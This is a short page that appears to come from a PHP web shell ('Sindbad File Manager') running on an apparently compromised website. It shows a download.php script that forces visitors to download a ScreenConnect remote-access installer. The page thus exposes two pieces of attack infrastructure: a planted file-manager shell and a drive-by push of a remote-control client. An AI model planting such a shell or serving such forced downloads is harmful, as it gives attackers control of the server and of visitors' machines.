Sindbad~EG File Manager

Current Path : /home/montenegroput/public_html/doc/
Upload File :
Current File : /home/montenegroput/public_html/doc/download.php

<?php
$fileName = 'ScreenConnect.ClientSetup.msi';

// Force immediate download
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($fileName).'"');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($fileName));
flush();
readfile($fileName);
exit;
?>

Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists